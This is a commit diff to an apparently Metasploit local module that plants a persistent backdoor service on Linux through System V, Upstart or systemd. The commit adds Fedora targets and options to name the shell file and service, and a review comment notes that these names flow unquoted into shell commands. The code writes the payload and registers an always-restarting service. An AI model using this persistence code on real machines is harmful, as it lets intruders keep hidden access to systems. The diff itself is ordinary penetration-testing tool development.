fedora compatibility, added naming options

bug/bundler_fix
h00die 2016-06-25 08:43:55 -04:00
parent bc293e2a8b
commit 1c20122648
2 changed files with 23 additions and 8 deletions


@ -6,6 +6,8 @@
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Centos 5 (System V)
5. Fedora 18 (systemd)
6. Fedora 20 (systemd)
## Verification Steps
@ -40,6 +42,14 @@
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
**SERVICE**
The name of the service to create. If not chosen, a 7 character random one is created.
**SHELL_NAME**
The name of the file to write with our shell. If not chosen, a 5 character random one is created.
## Scenarios
### System V (Centos 5 - root - chkconfig)


@ -29,10 +29,12 @@ class MetasploitModule < Msf::Exploit::Local
Ubuntu <= 9.04
Upstart:
CentOS 6
Fedora >= 9, < 15
Ubuntu >= 9.10, <= 14.10
systemd:
CentOS 7
Debian >=7, <=8
Debian >= 7, <=8
Fedora >= 15
Ubuntu >= 15.04
Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.
),
@ -73,7 +75,9 @@ class MetasploitModule < Msf::Exploit::Local
register_options(
[
OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin'])
OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
OptString.new('SERVICE', [false, 'Name of service to create'])
], self.class
)
end
@ -115,7 +119,8 @@ class MetasploitModule < Msf::Exploit::Local
end
def write_shell(path)
backdoor = "#{path}/#{Rex::Text.rand_text_alpha(5)}"
file_name = datastore['SHELL_NAME'] ? datastore['SHELL_NAME'] : Rex::Text.rand_text_alpha(5)
backdoor = "#{path}/#{file_name}"
vprint_status("Writing backdoor to #{backdoor}")
write_file(backdoor, payload.encoded)
cmd_exec("chmod 711 #{backdoor}")
@ -126,8 +131,8 @@ class MetasploitModule < Msf::Exploit::Local
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
script = "[Unit]\n"
script << "Description=Start daemon at boot time\n"
script << "After=networking.service\n"
script << "Requires=networking.service\n"
script << "After=\n"
script << "Requires=\n"
script << "[Service]\n"
script << "RestartSec=10s\n"
script << "Restart=always\n"
@ -136,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "[Install]\n"
script << "WantedBy=multi-user.target\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
write_file("/lib/systemd/system/#{service_filename}.service", script)
vprint_status('Enabling service')
@ -159,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "respawn\n"
script << "respawn limit unlimited\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
write_file("/etc/init/#{service_filename}.conf", script)
vprint_status('Starting service')
@ -263,7 +268,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "esac\n"
script << "exit 0\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init.d/#{service_filename}")
write_file("/etc/init.d/#{service_filename}", script)
cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
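Review bot: The new `SHELL_NAME` and `SERVICE` values are used without any validation, in `write_shell` and in the three `service_filename` assignments (systemd, Upstart and System V hunks). An empty string is truthy in Ruby, so `datastore['SHELL_NAME'] ? ... : ...` keeps `''` and `backdoor` becomes `"#{path}/"`, and an empty `SERVICE` yields file names such as `.service` and `.conf`. Both values are also interpolated unquoted into `cmd_exec` strings (`chmod 711 #{backdoor}`, `chmod 755 /etc/init.d/#{service_filename}`), where they were previously always random alphabetic text, so a name containing whitespace or shell metacharacters changes the command that runs on the host. I would treat blank as unset and reject anything outside a conservative set, for example `name = datastore['SERVICE'].to_s.strip` followed by `fail_with(Failure::BadConfig, 'Invalid SERVICE name') unless name.empty? || name =~ /\A[\w.-]+\z/`, with the same check for `SHELL_NAME`, ideally in one shared helper instead of four copies of the ternary. The enclosing methods begin or end outside the visible hunks, so a check elsewhere in the file cannot be ruled out from here.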